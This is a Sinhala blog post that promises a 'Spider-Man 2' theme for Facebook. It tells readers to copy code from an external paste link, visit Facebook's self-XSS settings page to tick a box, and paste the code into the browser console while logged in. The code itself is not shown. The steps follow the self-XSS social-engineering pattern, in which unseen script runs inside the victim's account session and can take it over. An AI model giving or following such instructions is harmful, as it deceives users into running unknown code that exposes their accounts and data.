සැලකිය යුතුයි !!

යම් කිසි Download ලින්ක් එකක් ක්ලික් කිරීමෙන් , විවෘත වන පිටුවේ තප්පර 5කට පසු දකුණු පස උඩ තිබේන 'Skip Ad' ක්ලික් කිරීමෙන්, ඔබට අවශ්‍ය පිටුවට යා හැක.


ඔයාලගෙ fb එකට SPIDER-MAN 2 THEME එක දාගමු.


ඔන්න ඉතිම් මට කාලෙකට පස්සෙ සුපිරි ලිපියක් ලියන්න ලබුනා. අද අපි කතා කරන්නේ ඔයාලගෙ fb එකට SPIDER-MAN 2 THEME එක දාගන්න විදිය  ගැන. හැබැයි මේක හැමදාම තියාගන්නනම් බැහැ

ඔයා ඉස්සෙල්ලම Google Chrome වලින් හරි Mozila Firefox වලින් හරි facebook log වෙන්න.

මිලින්ම ඔයා මේ ලෙන්ක් එකට ගිහිල්ලා මේ කෝඩ් එක කොපි කරගන්න. 
http://textuploader.com/9kli


ඊටපස්සෙ මෙතන තියන ලින්ක් එක ක්ලික් කරන්න.
https://www.facebook.com/selfxss

ඊටපස්සෙ පොඩි ටැබ් එකක් එයි. එතන පල්ලෙහ පොඩි chek box එකක් තියනව එතනට ටික් එකක් දාන්න.

ඊටපස්සෙ මෙතන තියන ලින්ක් එක ක්ලික් කරන්න.
https://www.facebook.com/



ඔයා දැන් facebook log වෙලා ඉන්නෙ  Google Chrome  නම් Keyboard එකෙ Ctrl+Shift+J Press කරලා Console Box එකට Ctrl+v Press කරලා Code එක Paste කරලා Enter Button එක Press කරන්න :)





ඔයා දැන් facebook log වෙලා ඉන්නෙ Firefox නම්  Ctrl+Shift+K Press කරලා Console Box එකට Copy කරගත්ත Code එක Ctrl+v Press කරලා Paste කර Enter Button එක Press කරන්න :)




ඊට පස්සෙ  නිකන් ඉන්න. ටික වෙලාවකින් ඔයාගෙ ෆ්බ්  එකට ලස්සනට theme එක වැටෙයි. ඔයාට ඕක අයින් කරගන්න ඕනෙ කියල හිතුනොත් කරන්න තියෙන්නෙ theme එක තියන page  එකට ගිහිල්ල F5 key එක ඔබල Reload කරන එකයි.


එහෙනම් වැඩේ මෙතනින් ඉවරයි.එහෙනම් මම යනවා . /bye

මොකක් හරි ගැටලුවක් තියෙනවනම් Comment 1කක් දාලා යන්න. මෙ Script එක ගැන ඔයාලට හිතෙන අදහස් Comment එකක් විදිහට දාලා යන්න අමතක කරන්න එපා ඈ . සේරටම ජය වේවා...!! :)

මේ ගැන ඔයාලගෙ අදහස් මොනවද?

අපේ බ්ලොග් එකේ තියන ලිපි හොදයිනම් ඒවා කියවල බලල comment එකකුත් දාන්න.අපේ facebook page එකතත් like එකක් දාල යන්න.

0 comment:

Post a Comment

 

Copyright @ 2015 Gadgematic Lanka. DMCA.com Protection Status